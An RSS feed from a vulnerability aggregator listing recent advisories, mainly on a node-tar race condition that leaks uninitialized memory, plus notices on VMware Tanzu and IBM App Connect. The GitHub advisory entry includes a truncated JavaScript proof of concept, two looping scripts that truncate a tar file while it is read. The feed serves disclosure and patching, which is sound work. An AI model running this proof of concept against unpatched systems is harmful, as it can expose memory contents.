<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Sun, 04 Oct 2026 04:15:00 +0000</lastBuildDate>
    <item>
      <title>bdu:2026-01714</title>
      <link>https://cve.radiocsirt.org/vuln/bdu:2026-01714</link>
      <description>bdu:2026-01714</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/bdu:2026-01714</guid>
    </item>
    <item>
      <title>certfr-2026-avi-0266 — De multiples vulnérabilités ont été découvertes dans VMware Tanzu. Elles permettent à un attaquant de provoquer un prob…</title>
      <link>https://cve.radiocsirt.org/vuln/certfr-2026-avi-0266</link>
      <description>certfr-2026-avi-0266</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/certfr-2026-avi-0266</guid>
    </item>
    <item>
      <title>EUVD-2026-257303</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-257303</link>
      <description>EUVD-2026-257303</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-257303</guid>
    </item>
    <item>
      <title>fkie_cve-2025-64118</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2025-64118</link>
      <description>&lt;p&gt;node-tar is a Tar for Node.js. In 7.5.1, using .t (aka .list) with { sync: true } to read tar entry contents returns uninitialized memory contents if tar file was changed on disk to a smaller size while being read. This vulnerability is fixed in 7.5.2.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;node-tar is a Tar for Node.js. In 7.5.1, using .t (aka .list) with { sync: true } to read tar entry contents returns uninitialized memory contents if tar file was changed on disk to a smaller size while being read. This vulnerability is fixed in 7.5.2.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2025-64118</guid>
    </item>
    <item>
      <title>GHSA-29xp-372q-xqph — node-tar has a race condition leading to uninitialized memory exposure</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-29xp-372q-xqph</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; npm: tar&lt;/p&gt;
&lt;p&gt;### Summary&lt;/p&gt;
&lt;p&gt;Using `.t` (aka `.list`) with `{ sync: true }` to read tar entry contents returns uninitialized memory contents if tar file was changed on disk to a smaller size while being read.&lt;/p&gt;
&lt;p&gt;### Details&lt;/p&gt;
&lt;p&gt;See:
* https://github.com/isaacs/node-tar/issues/445
* https://github.com/isaacs/node-tar/pull/446
* Regression happened in https://github.com/isaacs/node-tar/commit/5330eb04bc43014f216e5c271b40d5c00d45224d&lt;/p&gt;
&lt;p&gt;### PoC&lt;/p&gt;
&lt;p&gt;A:
```js
import * as tar from &amp;#39;tar&amp;#39;
import fs from &amp;#39;node:fs&amp;#39;&lt;/p&gt;
&lt;p&gt;fs.writeFileSync(&amp;#39;tar.test.tmp&amp;#39;, Buffer.alloc(1*1024))&lt;/p&gt;
&lt;p&gt;// from readme
const filesAdded = []
tar.c(
  {
    sync: true,
    file: &amp;#39;tar.test.tmp.tar&amp;#39;,
    onWriteEntry(entry) {
      // initially, it&amp;#39;s uppercase and 0o644
      console.log(&amp;#39;adding&amp;#39;, entry.path, entry.stat.mode.toString(8))
      // make all the paths lowercase
      entry.path = entry.path.toLowerCase()
      // make the entry executable
      entry.stat.mode = 0o755
      // in the archive, it&amp;#39;s lowercase and 0o755
      filesAdded.push([entry.path, entry.stat.mode.toString(8)])
    },
  },
  [&amp;#39;./tar.test.tmp&amp;#39;],
)&lt;/p&gt;
&lt;p&gt;const a = fs.readFileSync(&amp;#39;tar.test.tmp.tar&amp;#39;)&lt;/p&gt;
&lt;p&gt;for (let i = 0; ; i++){
  if (i % 10000 === 0) console.log(i)
  fs.writeFileSync(&amp;#39;tar.test.tmp.tar&amp;#39;, a)
  fs.truncateSync(&amp;#39;tar.test.tmp.tar&amp;#39;, 600)
}
```&lt;/p&gt;
&lt;p&gt;B (vulnerable):
```js
import * as tar from &amp;#39;tar&amp;#39;
import * as fs from &amp;#39;fs&amp;#39;&lt;/p&gt;
&lt;p&gt;while (true) {
  fs.readFileSync(import.meta.filename)
  tar.t({
    sync: true,
    file: &amp;#39;tar.test.tmp.tar&amp;#39;,
    onReadEntry: e =&amp;gt; e.on(&amp;#39;data&amp;#39;, b…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; npm: tar&lt;/p&gt;
&lt;p&gt;### Summary&lt;/p&gt;
&lt;p&gt;Using `.t` (aka `.list`) with `{ sync: true }` to read tar entry contents returns uninitialized memory contents if tar file was changed on disk to a smaller size while being read.&lt;/p&gt;
&lt;p&gt;### Details&lt;/p&gt;
&lt;p&gt;See:
* https://github.com/isaacs/node-tar/issues/445
* https://github.com/isaacs/node-tar/pull/446
* Regression happened in https://github.com/isaacs/node-tar/commit/5330eb04bc43014f216e5c271b40d5c00d45224d&lt;/p&gt;
&lt;p&gt;### PoC&lt;/p&gt;
&lt;p&gt;A:
```js
import * as tar from &amp;#39;tar&amp;#39;
import fs from &amp;#39;node:fs&amp;#39;&lt;/p&gt;
&lt;p&gt;fs.writeFileSync(&amp;#39;tar.test.tmp&amp;#39;, Buffer.alloc(1*1024))&lt;/p&gt;
&lt;p&gt;// from readme
const filesAdded = []
tar.c(
  {
    sync: true,
    file: &amp;#39;tar.test.tmp.tar&amp;#39;,
    onWriteEntry(entry) {
      // initially, it&amp;#39;s uppercase and 0o644
      console.log(&amp;#39;adding&amp;#39;, entry.path, entry.stat.mode.toString(8))
      // make all the paths lowercase
      entry.path = entry.path.toLowerCase()
      // make the entry executable
      entry.stat.mode = 0o755
      // in the archive, it&amp;#39;s lowercase and 0o755
      filesAdded.push([entry.path, entry.stat.mode.toString(8)])
    },
  },
  [&amp;#39;./tar.test.tmp&amp;#39;],
)&lt;/p&gt;
&lt;p&gt;const a = fs.readFileSync(&amp;#39;tar.test.tmp.tar&amp;#39;)&lt;/p&gt;
&lt;p&gt;for (let i = 0; ; i++){
  if (i % 10000 === 0) console.log(i)
  fs.writeFileSync(&amp;#39;tar.test.tmp.tar&amp;#39;, a)
  fs.truncateSync(&amp;#39;tar.test.tmp.tar&amp;#39;, 600)
}
```&lt;/p&gt;
&lt;p&gt;B (vulnerable):
```js
import * as tar from &amp;#39;tar&amp;#39;
import * as fs from &amp;#39;fs&amp;#39;&lt;/p&gt;
&lt;p&gt;while (true) {
  fs.readFileSync(import.meta.filename)
  tar.t({
    sync: true,
    file: &amp;#39;tar.test.tmp.tar&amp;#39;,
    onReadEntry: e =&amp;gt; e.on(&amp;#39;data&amp;#39;, b…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-29xp-372q-xqph</guid>
    </item>
    <item>
      <title>UBUNTU-CVE-2025-64118</title>
      <link>https://cve.radiocsirt.org/vuln/ubuntu-cve-2025-64118</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Ubuntu:Pro:14.04:LTS: node-tar, Ubuntu:Pro:16.04:LTS: node-tar, Ubuntu:18.04:LTS: node-tar, Ubuntu:Pro:20.04:LTS: node-tar, Ubuntu:22.04:LTS: node-tar, Ubuntu:24.04:LTS: node-tar, Ubuntu:25.10: node-tar, Ubuntu:26.04:LTS: node-tar&lt;/p&gt;
&lt;p&gt;node-tar is a Tar for Node.js. In 7.5.1, using .t (aka .list) with { sync: true } to read tar entry contents returns uninitialized memory contents if tar file was changed on disk to a smaller size while being read. This vulnerability is fixed in 7.5.2.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Ubuntu:Pro:14.04:LTS: node-tar, Ubuntu:Pro:16.04:LTS: node-tar, Ubuntu:18.04:LTS: node-tar, Ubuntu:Pro:20.04:LTS: node-tar, Ubuntu:22.04:LTS: node-tar, Ubuntu:24.04:LTS: node-tar, Ubuntu:25.10: node-tar, Ubuntu:26.04:LTS: node-tar&lt;/p&gt;
&lt;p&gt;node-tar is a Tar for Node.js. In 7.5.1, using .t (aka .list) with { sync: true } to read tar entry contents returns uninitialized memory contents if tar file was changed on disk to a smaller size while being read. This vulnerability is fixed in 7.5.2.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ubuntu-cve-2025-64118</guid>
    </item>
    <item>
      <title>WID-SEC-W-2025-2681 — IBM App Connect Enterprise: Mehrere Schwachstellen</title>
      <link>https://cve.radiocsirt.org/vuln/wid-sec-w-2025-2681</link>
      <description>&lt;p&gt;Ein Angreifer kann mehrere Schwachstellen in IBM App Connect Enterprise ausnutzen, um Sicherheitsmaßnahmen zu umgehen und Cross-Site-Scripting- oder Open-Redirect-Angriffe durchzuführen, einen Denial-of-Service-Zustand herbeizuführen, Daten zu manipulieren oder vertrauliche Informationen offenzulegen.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;Ein Angreifer kann mehrere Schwachstellen in IBM App Connect Enterprise ausnutzen, um Sicherheitsmaßnahmen zu umgehen und Cross-Site-Scripting- oder Open-Redirect-Angriffe durchzuführen, einen Denial-of-Service-Zustand herbeizuführen, Daten zu manipulieren oder vertrauliche Informationen offenzulegen.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/wid-sec-w-2025-2681</guid>
    </item>
  </channel>
</rss>
